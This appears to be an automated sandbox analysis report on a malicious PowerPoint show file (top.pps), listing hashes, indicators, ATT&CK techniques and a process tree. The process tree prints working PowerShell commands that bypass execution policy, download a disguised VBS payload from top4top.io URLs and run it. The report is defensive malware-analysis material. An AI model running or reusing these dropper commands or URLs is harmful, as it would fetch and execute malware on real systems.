125d1d308f8413f06a1b3de8537f7aa5d7d1951c97b8e5229d14367eb05b325a

General

Target

top.pps
Size

107KB
MD5

ce4c22fb1f1d83002fdb009744fc1b89
SHA1

5c07aa807a91f10466116398b1229a21e717b577
SHA256

125d1d308f8413f06a1b3de8537f7aa5d7d1951c97b8e5229d14367eb05b325a
SHA512

994813803016204719dca6091b7817c649488490e5bbb1531a12b2c3fac973e01d17358da3f2ad9d4f8ed0fdb97aa4a5dcf986e93e137ab87fd6e49310760712
SSDEEP

768:zLnjq8i2s5xgumn7PWY7k75SMkG9XEut6DqQ2TOG:HG8Ds5WJnygk/9XgDqQ2

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.top4top.io/p_1644x1sq02.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://h.top4top.io/p_1644ilib41.jpg

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	60	2912	cmd.exe	83
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3796	2912	cmd.exe	83

Blocklisted process makes network request 2 IoCs

flow	pid	Process
22	4136	powershell.exe
24	4272	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2912	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4136	powershell.exe
4272	powershell.exe
4136	powershell.exe
4272	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2912	POWERPNT.EXE
2912	POWERPNT.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 60	2912	POWERPNT.EXE	84
PID 2912 wrote to memory of 60	2912	POWERPNT.EXE	84
PID 2912 wrote to memory of 3796	2912	POWERPNT.EXE	87
PID 2912 wrote to memory of 3796	2912	POWERPNT.EXE	87
PID 3796 wrote to memory of 4136	3796	cmd.exe	88
PID 3796 wrote to memory of 4136	3796	cmd.exe	88
PID 60 wrote to memory of 4272	60	cmd.exe	89
PID 60 wrote to memory of 4272	60	cmd.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\top.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://h.top4top.io/p_1644ilib41.jpg','%APPDATA%\Client.vbs');Start-Process '%APPDATA%\Client.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://h.top4top.io/p_1644ilib41.jpg','C:\Users\Admin\AppData\Roaming\Client.vbs');Start-Process 'C:\Users\Admin\AppData\Roaming\Client.vbs'
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://i.top4top.io/p_1644x1sq02.jpg','%public%\Client.vbs');Start-Process '%public%\Client.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://i.top4top.io/p_1644x1sq02.jpg','C:\Users\Public\Client.vbs');Start-Process 'C:\Users\Public\Client.vbs'
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4136

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e42bec1f8f4c3705f1df36c21c85531

SHA1
c9d6aac3c1b16ed12f22185ebdc9f921cd396d14

SHA256
f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2

SHA512
d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cri453ol.dzw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2912-139-0x00007FFCD79B0000-0x00007FFCD79C0000-memory.dmp

Filesize
64KB

Download
memory/2912-137-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-138-0x00007FFCD79B0000-0x00007FFCD79C0000-memory.dmp

Filesize
64KB

Download
memory/2912-136-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-192-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-133-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-191-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-135-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-190-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-189-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/2912-134-0x00007FFCD9FF0000-0x00007FFCDA000000-memory.dmp

Filesize
64KB

Download
memory/4136-150-0x000001E286720000-0x000001E286730000-memory.dmp

Filesize
64KB

Download
memory/4136-170-0x000001E286720000-0x000001E286730000-memory.dmp

Filesize
64KB

Download
memory/4136-160-0x000001E29EDC0000-0x000001E29EDE2000-memory.dmp

Filesize
136KB

Download
memory/4136-149-0x000001E286720000-0x000001E286730000-memory.dmp

Filesize
64KB

Download
memory/4272-171-0x000001947B980000-0x000001947B990000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads